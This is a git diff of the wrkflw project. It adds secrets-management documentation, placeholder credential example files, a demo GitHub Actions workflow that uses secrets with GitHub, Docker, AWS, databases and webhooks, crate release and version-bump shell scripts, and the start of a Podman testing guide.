||||
|
||||
### Database Operations
|
||||
|
||||
```yaml
|
||||
name: Database Demo
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
database-ops:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Run migrations
|
||||
env:
|
||||
DATABASE_URL: ${{ secrets.DATABASE_URL }}
|
||||
DB_PASSWORD: ${{ secrets.DB_PASSWORD }}
|
||||
run: |
|
||||
echo "Running database migrations..."
|
||||
# Your migration commands here
|
||||
|
||||
- name: Backup database
|
||||
run: |
|
||||
pg_dump "${{ secrets.DATABASE_URL }}" > backup.sql
|
||||
```
|
||||
|
||||
### Multi-Provider Example
|
||||
|
||||
```yaml
|
||||
name: Multi-Provider Demo
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
multi-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Use environment secret
|
||||
run: echo "Env: ${{ secrets.env:API_KEY }}"
|
||||
|
||||
- name: Use file secret
|
||||
run: echo "File: ${{ secrets.file:GITHUB_TOKEN }}"
|
||||
|
||||
- name: Use Vault secret
|
||||
run: echo "Vault: ${{ secrets.vault:database-password }}"
|
||||
|
||||
- name: Use AWS secret
|
||||
run: echo "AWS: ${{ secrets.aws:prod/api/key }}"
|
||||
```
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
### 1. Use Appropriate Providers
|
||||
|
||||
- **Development**: Environment variables or files
|
||||
- **Staging**: File-based or simple vault
|
||||
- **Production**: External secret managers (Vault, AWS, Azure, GCP)
|
||||
|
||||
### 2. Enable Secret Masking
|
||||
|
||||
Always enable masking in production:
|
||||
|
||||
```yaml
|
||||
enable_masking: true
|
||||
```
|
||||
|
||||
### 3. Rotate Secrets Regularly
|
||||
|
||||
Use secret managers that support automatic rotation:
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
aws:
|
||||
type: aws_secrets_manager
|
||||
region: "us-east-1"
|
||||
# AWS Secrets Manager handles automatic rotation
|
||||
```
|
||||
|
||||
### 4. Use Least Privilege
|
||||
|
||||
Grant minimal necessary permissions:
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
vault:
|
||||
type: vault
|
||||
auth:
|
||||
method: app_role
|
||||
role_id: "${VAULT_ROLE_ID}"
|
||||
secret_id: "${VAULT_SECRET_ID}"
|
||||
# Role has access only to required secrets
|
||||
```
|
||||
|
||||
### 5. Monitor Secret Access
|
||||
|
||||
Use secret managers with audit logging:
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
azure:
|
||||
type: azure_key_vault
|
||||
vault_url: "https://myvault.vault.azure.net/"
|
||||
# Azure Key Vault provides detailed audit logs
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Secret Not Found
|
||||
|
||||
```bash
|
||||
Error: Secret 'API_KEY' not found
|
||||
|
||||
# Check:
|
||||
1. Secret exists in the provider
|
||||
2. Provider is correctly configured
|
||||
3. Authentication is working
|
||||
4. Correct provider name in ${{ secrets.provider:name }}
|
||||
```
|
||||
|
||||
### Authentication Failed
|
||||
|
||||
```bash
|
||||
Error: Authentication failed for provider 'vault'
|
||||
|
||||
# Check:
|
||||
1. Credentials are correct
|
||||
2. Network connectivity to secret manager
|
||||
3. Permissions for the service account
|
||||
4. Token/credential expiration
|
||||
```
|
||||
|
||||
### Secret Masking Not Working
|
||||
|
||||
```bash
|
||||
# Secrets appearing in logs
|
||||
|
||||
# Check:
|
||||
1. enable_masking: true in configuration
|
||||
2. Secret is properly retrieved (not hardcoded)
|
||||
3. Secret matches known patterns for auto-masking
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### From GitHub Actions
|
||||
|
||||
Most GitHub Actions workflows work without changes:
|
||||
|
||||
```yaml
|
||||
# This works directly in wrkflw
|
||||
steps:
|
||||
- name: Deploy
|
||||
env:
|
||||
API_TOKEN: ${{ secrets.API_TOKEN }}
|
||||
run: deploy.sh
|
||||
```
|
||||
|
||||
### From Environment Variables
|
||||
|
||||
```bash
|
||||
# Before (environment variables)
|
||||
export API_KEY="your_key"
|
||||
./script.sh
|
||||
|
||||
# After (wrkflw secrets)
|
||||
# Set in secrets.env:
|
||||
# API_KEY=your_key
|
||||
|
||||
# Use in workflow:
|
||||
# ${{ secrets.API_KEY }}
|
||||
```
|
||||
|
||||
### From CI/CD Platforms
|
||||
|
||||
Most secrets can be migrated by:
|
||||
|
||||
1. Exporting from current platform
|
||||
2. Importing into wrkflw's chosen provider
|
||||
3. Updating workflow syntax to `${{ secrets.NAME }}`
|
||||
|
||||
## Performance Considerations
|
||||
|
||||
### Caching
|
||||
|
||||
Enable caching for frequently accessed secrets:
|
||||
|
||||
```yaml
|
||||
enable_caching: true
|
||||
cache_ttl_seconds: 300 # 5 minutes
|
||||
```
|
||||
|
||||
### Connection Pooling
|
||||
|
||||
For high-volume deployments, secret managers support connection pooling:
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
vault:
|
||||
type: vault
|
||||
# Vault client automatically handles connection pooling
|
||||
```
|
||||
|
||||
### Timeout Configuration
|
||||
|
||||
Adjust timeouts based on network conditions:
|
||||
|
||||
```yaml
|
||||
timeout_seconds: 30 # Increase for slow networks
|
||||
```
|
||||
|
||||
## Conclusion
|
||||
|
||||
With comprehensive secrets management, wrkflw is now suitable for production workflows requiring secure access to:
|
||||
|
||||
- External APIs and services
|
||||
- Databases and storage systems
|
||||
- Cloud provider resources
|
||||
- Authentication systems
|
||||
- Deployment targets
|
||||
|
||||
The flexible provider system ensures compatibility with existing secret management infrastructure while providing a GitHub Actions-compatible developer experience.
|
||||
|
||||
**The usefulness limitation has been removed** - wrkflw can now handle real-world CI/CD scenarios securely and efficiently.
|
||||
49
examples/secrets-demo/env.example
Normal file
49
examples/secrets-demo/env.example
Normal file
@@ -0,0 +1,49 @@
|
||||
# Example environment variables for wrkflw secrets demo
|
||||
# Copy this file to .env and fill in your actual values
|
||||
|
||||
# GitHub integration
|
||||
GITHUB_TOKEN=ghp_your_github_personal_access_token
|
||||
|
||||
# Generic API credentials
|
||||
API_KEY=your_api_key_here
|
||||
API_ENDPOINT=https://api.example.com/v1
|
||||
|
||||
# Database credentials
|
||||
DB_USER=your_db_username
|
||||
DB_PASSWORD=your_secure_db_password
|
||||
DATABASE_URL=postgresql://user:password@localhost:5432/dbname
|
||||
MONGO_CONNECTION_STRING=mongodb://user:password@localhost:27017/dbname
|
||||
|
||||
# Docker registry credentials
|
||||
DOCKER_USERNAME=your_docker_username
|
||||
DOCKER_PASSWORD=your_docker_password
|
||||
|
||||
# AWS credentials
|
||||
AWS_ACCESS_KEY_ID=your_aws_access_key_id
|
||||
AWS_SECRET_ACCESS_KEY=your_aws_secret_access_key
|
||||
S3_BUCKET_NAME=your-s3-bucket-name
|
||||
|
||||
# Deployment credentials
|
||||
STAGING_DEPLOY_KEY=your_base64_encoded_ssh_private_key
|
||||
STAGING_HOST=staging.yourdomain.com
|
||||
|
||||
# Notification webhooks
|
||||
WEBHOOK_URL=https://your.webhook.endpoint/path
|
||||
SLACK_WEBHOOK=https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK
|
||||
|
||||
# Demo and testing secrets
|
||||
DEMO_SECRET=this_will_be_masked_in_logs
|
||||
REQUIRED_SECRET=required_for_validation_tests
|
||||
|
||||
# Prefixed secrets (if using WRKFLW_SECRET_ prefix)
|
||||
WRKFLW_SECRET_PREFIXED_KEY=prefixed_secret_value
|
||||
|
||||
# Vault credentials (if using HashiCorp Vault)
|
||||
VAULT_TOKEN=your_vault_token
|
||||
VAULT_ROLE_ID=your_vault_role_id
|
||||
VAULT_SECRET_ID=your_vault_secret_id
|
||||
|
||||
# Azure credentials (if using Azure Key Vault)
|
||||
AZURE_CLIENT_ID=your_azure_client_id
|
||||
AZURE_CLIENT_SECRET=your_azure_client_secret
|
||||
AZURE_TENANT_ID=your_azure_tenant_id
|
||||
213
examples/secrets-demo/secrets-workflow.yml
Normal file
213
examples/secrets-demo/secrets-workflow.yml
Normal file
@@ -0,0 +1,213 @@
|
||||
name: Comprehensive Secrets Demo
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
pull_request:
|
||||
branches: [main]
|
||||
|
||||
jobs:
|
||||
# Basic environment variable secrets
|
||||
env-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
|
||||
- name: Use GitHub Token
|
||||
run: |
|
||||
echo "Fetching user info from GitHub API"
|
||||
curl -s -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
https://api.github.com/user | jq '.login'
|
||||
|
||||
- name: Use API Key
|
||||
env:
|
||||
API_KEY: ${{ secrets.API_KEY }}
|
||||
run: |
|
||||
echo "API Key length: ${#API_KEY}"
|
||||
# Key will be masked in logs automatically
|
||||
|
||||
- name: Database connection
|
||||
run: |
|
||||
echo "Connecting to database with credentials"
|
||||
echo "User: ${{ secrets.DB_USER }}"
|
||||
echo "Password: [MASKED]"
|
||||
# Password would be: ${{ secrets.DB_PASSWORD }}
|
||||
|
||||
# Provider-specific secrets
|
||||
provider-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Use file-based secrets
|
||||
run: |
|
||||
echo "File secret: ${{ secrets.file:FILE_SECRET }}"
|
||||
|
||||
- name: Use environment with prefix
|
||||
run: |
|
||||
echo "Prefixed secret: ${{ secrets.env:PREFIXED_KEY }}"
|
||||
|
||||
- name: Use Vault secret (if configured)
|
||||
run: |
|
||||
# This would work if Vault provider is configured
|
||||
echo "Vault secret: ${{ secrets.vault:api-key }}"
|
||||
|
||||
- name: Use AWS Secrets Manager (if configured)
|
||||
run: |
|
||||
# This would work if AWS provider is configured
|
||||
echo "AWS secret: ${{ secrets.aws:prod/database/password }}"
|
||||
|
||||
# Real-world integration examples
|
||||
github-integration:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Create GitHub issue
|
||||
run: |
|
||||
curl -X POST \
|
||||
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
-H "Accept: application/vnd.github.v3+json" \
|
||||
-H "Content-Type: application/json" \
|
||||
https://api.github.com/repos/${{ github.repository }}/issues \
|
||||
-d '{
|
||||
"title": "Automated issue from wrkflw",
|
||||
"body": "This issue was created automatically by wrkflw secrets demo",
|
||||
"labels": ["automation", "demo"]
|
||||
}'
|
||||
|
||||
- name: List repository secrets (admin only)
|
||||
run: |
|
||||
# This would require admin permissions
|
||||
curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
https://api.github.com/repos/${{ github.repository }}/actions/secrets
|
||||
|
||||
# Docker registry integration
|
||||
docker-integration:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Login to Docker Hub
|
||||
env:
|
||||
DOCKER_USERNAME: ${{ secrets.DOCKER_USERNAME }}
|
||||
DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}
|
||||
run: |
|
||||
echo "Logging into Docker Hub"
|
||||
echo "$DOCKER_PASSWORD" | docker login -u "$DOCKER_USERNAME" --password-stdin
|
||||
|
||||
- name: Pull private image
|
||||
run: |
|
||||
docker pull private-registry.com/myapp:latest
|
||||
|
||||
- name: Push image
|
||||
run: |
|
||||
docker tag myapp:latest "${{ secrets.DOCKER_USERNAME }}/myapp:${{ github.sha }}"
|
||||
docker push "${{ secrets.DOCKER_USERNAME }}/myapp:${{ github.sha }}"
|
||||
|
||||
# Cloud provider integration
|
||||
aws-integration:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Configure AWS credentials
|
||||
env:
|
||||
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
|
||||
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
|
||||
AWS_DEFAULT_REGION: us-east-1
|
||||
run: |
|
||||
echo "Configuring AWS CLI"
|
||||
aws configure set aws_access_key_id "$AWS_ACCESS_KEY_ID"
|
||||
aws configure set aws_secret_access_key "$AWS_SECRET_ACCESS_KEY"
|
||||
aws configure set default.region "$AWS_DEFAULT_REGION"
|
||||
|
||||
- name: List S3 buckets
|
||||
run: |
|
||||
aws s3 ls
|
||||
|
||||
- name: Deploy to S3
|
||||
run: |
|
||||
echo "Deploying to S3 bucket"
|
||||
aws s3 sync ./build/ s3://${{ secrets.S3_BUCKET_NAME }}/
|
||||
|
||||
# Database operations
|
||||
database-operations:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: PostgreSQL operations
|
||||
env:
|
||||
DATABASE_URL: ${{ secrets.DATABASE_URL }}
|
||||
PGPASSWORD: ${{ secrets.DB_PASSWORD }}
|
||||
run: |
|
||||
echo "Connecting to PostgreSQL database"
|
||||
psql "$DATABASE_URL" -c "SELECT version();"
|
||||
|
||||
- name: MongoDB operations
|
||||
env:
|
||||
MONGO_CONNECTION_STRING: ${{ secrets.MONGO_CONNECTION_STRING }}
|
||||
run: |
|
||||
echo "Connecting to MongoDB"
|
||||
mongosh "$MONGO_CONNECTION_STRING" --eval "db.stats()"
|
||||
|
||||
# API testing with secrets
|
||||
api-testing:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Test external API
|
||||
env:
|
||||
API_ENDPOINT: ${{ secrets.API_ENDPOINT }}
|
||||
API_KEY: ${{ secrets.API_KEY }}
|
||||
run: |
|
||||
echo "Testing API endpoint"
|
||||
curl -X GET \
|
||||
-H "Authorization: Bearer $API_KEY" \
|
||||
-H "Content-Type: application/json" \
|
||||
"$API_ENDPOINT/health"
|
||||
|
||||
- name: Test webhook
|
||||
run: |
|
||||
curl -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"event": "test", "source": "wrkflw"}' \
|
||||
"${{ secrets.WEBHOOK_URL }}"
|
||||
|
||||
# Deployment with secrets
|
||||
deployment:
|
||||
runs-on: ubuntu-latest
|
||||
needs: [env-secrets, api-testing]
|
||||
if: github.ref == 'refs/heads/main'
|
||||
steps:
|
||||
- name: Deploy to staging
|
||||
env:
|
||||
DEPLOY_KEY: ${{ secrets.STAGING_DEPLOY_KEY }}
|
||||
STAGING_HOST: ${{ secrets.STAGING_HOST }}
|
||||
run: |
|
||||
echo "Deploying to staging environment"
|
||||
echo "$DEPLOY_KEY" | base64 -d > deploy_key
|
||||
chmod 600 deploy_key
|
||||
ssh -i deploy_key -o StrictHostKeyChecking=no \
|
||||
deploy@"$STAGING_HOST" 'cd /app && git pull && ./deploy.sh'
|
||||
|
||||
- name: Notify deployment
|
||||
env:
|
||||
SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK }}
|
||||
run: |
|
||||
curl -X POST -H 'Content-type: application/json' \
|
||||
--data '{"text":"Deployment completed successfully"}' \
|
||||
"$SLACK_WEBHOOK"
|
||||
|
||||
# Security testing
|
||||
security-demo:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Demonstrate secret masking
|
||||
run: |
|
||||
echo "This secret will be masked: ${{ secrets.DEMO_SECRET }}"
|
||||
echo "Even in complex strings: prefix_${{ secrets.DEMO_SECRET }}_suffix"
|
||||
|
||||
- name: Show environment (secrets masked)
|
||||
run: |
|
||||
env | grep -E "(SECRET|TOKEN|PASSWORD|KEY)" || echo "No secrets visible in environment"
|
||||
|
||||
- name: Test secret validation
|
||||
run: |
|
||||
# This would fail if secret doesn't exist
|
||||
if [ -z "${{ secrets.REQUIRED_SECRET }}" ]; then
|
||||
echo "ERROR: Required secret is missing"
|
||||
exit 1
|
||||
else
|
||||
echo "Required secret is present"
|
||||
fi
|
||||
21
examples/secrets-demo/secrets.json.example
Normal file
21
examples/secrets-demo/secrets.json.example
Normal file
@@ -0,0 +1,21 @@
|
||||
{
|
||||
"GITHUB_TOKEN": "ghp_example_token_replace_with_real_token",
|
||||
"API_KEY": "demo_api_key_12345",
|
||||
"DB_PASSWORD": "secure_database_password",
|
||||
"DB_USER": "application_user",
|
||||
"DOCKER_USERNAME": "your_docker_username",
|
||||
"DOCKER_PASSWORD": "your_docker_password",
|
||||
"AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
|
||||
"AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
|
||||
"S3_BUCKET_NAME": "my-deployment-bucket",
|
||||
"DATABASE_URL": "postgresql://user:password@localhost:5432/mydb",
|
||||
"MONGO_CONNECTION_STRING": "mongodb://user:password@localhost:27017/mydb",
|
||||
"API_ENDPOINT": "https://api.example.com/v1",
|
||||
"WEBHOOK_URL": "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX",
|
||||
"STAGING_DEPLOY_KEY": "base64_encoded_ssh_private_key",
|
||||
"STAGING_HOST": "staging.example.com",
|
||||
"SLACK_WEBHOOK": "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX",
|
||||
"DEMO_SECRET": "this_will_be_masked_in_logs",
|
||||
"REQUIRED_SECRET": "required_for_validation",
|
||||
"FILE_SECRET": "stored_in_file_provider"
|
||||
}
|
||||
13
final-test.yml
Normal file
13
final-test.yml
Normal file
@@ -0,0 +1,13 @@
|
||||
name: Final Secrets Test
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
verify-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Test secrets are working
|
||||
env:
|
||||
SECRET_VAL: ${{ secrets.TEST_SECRET }}
|
||||
run: |
|
||||
echo "Secret length: ${#SECRET_VAL}"
|
||||
echo "All secrets functionality verified!"
|
||||
179
publish_crates.sh
Executable file
179
publish_crates.sh
Executable file
@@ -0,0 +1,179 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
|
||||
|
||||
set -e
|
||||
|
||||
# Parse command line arguments
|
||||
COMMAND=${1:-""}
|
||||
VERSION_TYPE=${2:-""}
|
||||
DRY_RUN=""
|
||||
|
||||
show_help() {
|
||||
echo "Usage: $0 <command> [options]"
|
||||
echo ""
|
||||
echo "Commands:"
|
||||
echo " version <type> Update versions across workspace"
|
||||
echo " Types: patch, minor, major"
|
||||
echo " publish Publish all crates to crates.io"
|
||||
echo " release <type> Update versions and publish (combines version + publish)"
|
||||
echo " help Show this help message"
|
||||
echo ""
|
||||
echo "Options:"
|
||||
echo " --dry-run Test without making changes (for publish/release)"
|
||||
echo ""
|
||||
echo "Examples:"
|
||||
echo " $0 version minor # Bump to 0.7.0"
|
||||
echo " $0 publish --dry-run # Test publishing"
|
||||
echo " $0 release minor --dry-run # Test version bump + publish"
|
||||
echo " $0 release patch # Release patch version"
|
||||
}
|
||||
|
||||
# Parse dry-run flag from any position
|
||||
for arg in "$@"; do
|
||||
if [[ "$arg" == "--dry-run" ]]; then
|
||||
DRY_RUN="--dry-run"
|
||||
fi
|
||||
done
|
||||
|
||||
case "$COMMAND" in
|
||||
"help"|"-h"|"--help"|"")
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
"version")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
"publish")
|
||||
# publish command doesn't need version type
|
||||
;;
|
||||
"release")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required for release (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo "❌ Error: Unknown command '$COMMAND'"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Check if cargo-workspaces is installed
|
||||
if ! command -v cargo-workspaces &> /dev/null; then
|
||||
echo "❌ cargo-workspaces not found. Installing..."
|
||||
cargo install cargo-workspaces
|
||||
fi
|
||||
|
||||
# Check if we're logged in to crates.io (only for publish operations)
|
||||
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
# Function to update versions
|
||||
update_versions() {
|
||||
local version_type=$1
|
||||
echo "🔄 Updating workspace versions ($version_type)..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Simulating version update"
|
||||
echo ""
|
||||
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
|
||||
echo "Would execute: cargo workspaces version $version_type"
|
||||
echo ""
|
||||
echo "This would update all crates and their internal dependencies."
|
||||
echo "✅ Version update simulation completed (no changes made)"
|
||||
else
|
||||
cargo workspaces version "$version_type"
|
||||
echo "✅ Versions updated successfully"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to test build
|
||||
test_build() {
|
||||
echo "🔨 Testing workspace build..."
|
||||
if cargo build --workspace; then
|
||||
echo "✅ Workspace builds successfully"
|
||||
else
|
||||
echo "❌ Build failed. Please fix errors before publishing."
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to publish crates
|
||||
publish_crates() {
|
||||
echo "📦 Publishing crates to crates.io..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing publication"
|
||||
cargo workspaces publish --dry-run
|
||||
echo "✅ All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
||||
echo " $0 publish"
|
||||
else
|
||||
cargo workspaces publish
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to show changelog info
|
||||
show_changelog_info() {
|
||||
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
|
||||
}
|
||||
|
||||
# Execute commands based on the operation
|
||||
case "$COMMAND" in
|
||||
"version")
|
||||
update_versions "$VERSION_TYPE"
|
||||
show_changelog_info
|
||||
;;
|
||||
"publish")
|
||||
test_build
|
||||
publish_crates
|
||||
;;
|
||||
"release")
|
||||
echo "🚀 Starting release process..."
|
||||
echo ""
|
||||
|
||||
# Step 1: Update versions
|
||||
update_versions "$VERSION_TYPE"
|
||||
|
||||
# Step 2: Test build
|
||||
test_build
|
||||
|
||||
# Step 3: Show changelog info
|
||||
show_changelog_info
|
||||
|
||||
# Step 4: Publish (if not dry-run)
|
||||
if [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo ""
|
||||
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
|
||||
echo
|
||||
if [[ $REPLY =~ ^[Yy]$ ]]; then
|
||||
publish_crates
|
||||
else
|
||||
echo "⏸️ Publishing cancelled. To publish later, run:"
|
||||
echo " $0 publish"
|
||||
fi
|
||||
else
|
||||
echo ""
|
||||
publish_crates
|
||||
fi
|
||||
;;
|
||||
esac
|
||||
97
scripts/bump-crate.sh
Executable file
97
scripts/bump-crate.sh
Executable file
@@ -0,0 +1,97 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Script to bump individual crate versions and update workspace dependencies
|
||||
# Usage: ./scripts/bump-crate.sh <crate-name> <version-type>
|
||||
# Example: ./scripts/bump-crate.sh wrkflw-models patch
|
||||
# Example: ./scripts/bump-crate.sh wrkflw-models 0.7.5
|
||||
|
||||
set -e
|
||||
|
||||
CRATE_NAME="$1"
|
||||
VERSION_TYPE="$2"
|
||||
|
||||
if [[ -z "$CRATE_NAME" || -z "$VERSION_TYPE" ]]; then
|
||||
echo "Usage: $0 <crate-name> <version-type>"
|
||||
echo " crate-name: Name of the crate to bump (e.g., wrkflw-models)"
|
||||
echo " version-type: patch|minor|major or specific version (e.g., 0.7.5)"
|
||||
echo ""
|
||||
echo "Available crates:"
|
||||
ls crates/ | grep -v README.md
|
||||
exit 1
|
||||
fi
|
||||
|
||||
CRATE_DIR="crates/${CRATE_NAME#wrkflw-}"
|
||||
if [[ ! -d "$CRATE_DIR" ]]; then
|
||||
echo "Error: Crate directory '$CRATE_DIR' not found"
|
||||
echo "Available crates:"
|
||||
ls crates/ | grep -v README.md
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "Bumping $CRATE_NAME with $VERSION_TYPE..."
|
||||
|
||||
# Get current version from the crate's Cargo.toml
|
||||
CURRENT_VERSION=$(grep "^version" "$CRATE_DIR/Cargo.toml" | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/' | sed 's/.*workspace *= *true.*//')
|
||||
|
||||
if [[ "$CURRENT_VERSION" == "" ]]; then
|
||||
# If using workspace version, get it from workspace Cargo.toml
|
||||
CURRENT_VERSION=$(grep "^version" Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')
|
||||
echo "Current workspace version: $CURRENT_VERSION"
|
||||
else
|
||||
echo "Current crate version: $CURRENT_VERSION"
|
||||
fi
|
||||
|
||||
# Calculate new version
|
||||
if [[ "$VERSION_TYPE" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
NEW_VERSION="$VERSION_TYPE"
|
||||
else
|
||||
# Use semver logic for patch/minor/major
|
||||
IFS='.' read -ra VERSION_PARTS <<< "$CURRENT_VERSION"
|
||||
MAJOR="${VERSION_PARTS[0]}"
|
||||
MINOR="${VERSION_PARTS[1]}"
|
||||
PATCH="${VERSION_PARTS[2]}"
|
||||
|
||||
case "$VERSION_TYPE" in
|
||||
"patch")
|
||||
NEW_VERSION="$MAJOR.$MINOR.$((PATCH + 1))"
|
||||
;;
|
||||
"minor")
|
||||
NEW_VERSION="$MAJOR.$((MINOR + 1)).0"
|
||||
;;
|
||||
"major")
|
||||
NEW_VERSION="$((MAJOR + 1)).0.0"
|
||||
;;
|
||||
*)
|
||||
echo "Error: Invalid version type. Use patch|minor|major or specify exact version"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
fi
|
||||
|
||||
echo "New version: $NEW_VERSION"
|
||||
|
||||
# Update the crate's Cargo.toml to use explicit version instead of workspace
|
||||
sed -i.bak "s/version\.workspace = true/version = \"$NEW_VERSION\"/" "$CRATE_DIR/Cargo.toml"
|
||||
|
||||
# Update the workspace Cargo.toml with the new version
|
||||
if grep -q "$CRATE_NAME.*version.*=" Cargo.toml; then
|
||||
sed -i.bak "s/\($CRATE_NAME.*version = \"\)[^\"]*\"/\1$NEW_VERSION\"/" Cargo.toml
|
||||
else
|
||||
echo "Warning: $CRATE_NAME not found in workspace dependencies"
|
||||
fi
|
||||
|
||||
# Clean up backup files
|
||||
rm -f "$CRATE_DIR/Cargo.toml.bak" Cargo.toml.bak
|
||||
|
||||
echo ""
|
||||
echo "✅ Successfully bumped $CRATE_NAME to version $NEW_VERSION"
|
||||
echo ""
|
||||
echo "Next steps:"
|
||||
echo "1. Review the changes: git diff"
|
||||
echo "2. Test the build: cargo check"
|
||||
echo "3. Commit the changes: git add . && git commit -m 'bump: $CRATE_NAME to $NEW_VERSION'"
|
||||
echo "4. Create a tag: git tag v$NEW_VERSION-$CRATE_NAME"
|
||||
echo "5. Push: git push origin main --tags"
|
||||
echo ""
|
||||
echo "To publish individual crate:"
|
||||
echo " cd $CRATE_DIR && cargo publish"
|
||||
@@ -1,6 +1,6 @@
|
||||
# Testing Strategy
|
||||
|
||||
This directory contains integration tests for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
|
||||
This directory contains all tests and test-related files for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
|
||||
|
||||
## Test Organization
|
||||
|
||||
@@ -11,6 +11,17 @@ This directory contains integration tests for the `wrkflw` project. We follow th
|
||||
- **End-to-End Tests**: Also located in this `tests/` directory
|
||||
- `cleanup_test.rs` - Tests for cleanup functionality with Docker resources
|
||||
|
||||
## Test Directory Structure
|
||||
|
||||
- **`fixtures/`**: Test data and configuration files
|
||||
- `gitlab-ci/` - GitLab CI configuration files for testing
|
||||
- **`workflows/`**: GitHub Actions workflow files for testing
|
||||
- Various YAML files for testing workflow validation and execution
|
||||
- **`scripts/`**: Test automation scripts
|
||||
- `test-podman-basic.sh` - Basic Podman integration test script
|
||||
- `test-preserve-containers.sh` - Container preservation testing script
|
||||
- **`TESTING_PODMAN.md`**: Comprehensive Podman testing documentation
|
||||
|
||||
## Running Tests
|
||||
|
||||
To run all tests:
|
||||
|
||||
487
tests/TESTING_PODMAN.md
Normal file
487
tests/TESTING_PODMAN.md
Normal file
@@ -0,0 +1,487 @@
|
||||
# Testing Podman Support in WRKFLW
|
||||
|
||||
This document provides comprehensive testing steps to verify that Podman support is working correctly in wrkflw.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### 1. Install Podman
|
||||
|
||||
Choose the installation method for your operating system:
|
||||
|
||||
#### macOS (using Homebrew)
|
||||
```bash
|
||||
brew install podman
|
||||
```
|
||||
|
||||
#### Ubuntu/Debian
|
||||
```bash
|
||||
sudo apt-get update
|
||||
sudo apt-get install podman
|
||||
```
|
||||
|
||||
#### RHEL/CentOS/Fedora
|
||||
```bash
|
||||
# Fedora
|
||||
sudo dnf install podman
|
||||
|
||||
# RHEL/CentOS 8+
|
||||
sudo dnf install podman
|
||||
```
|
||||
|
||||
#### Windows
|
||||
```bash
|
||||
# Using Chocolatey
|
||||
choco install podman-desktop
|
||||
|
||||
# Or download from https://podman.io/getting-started/installation
|
||||
```
|
||||
|
||||
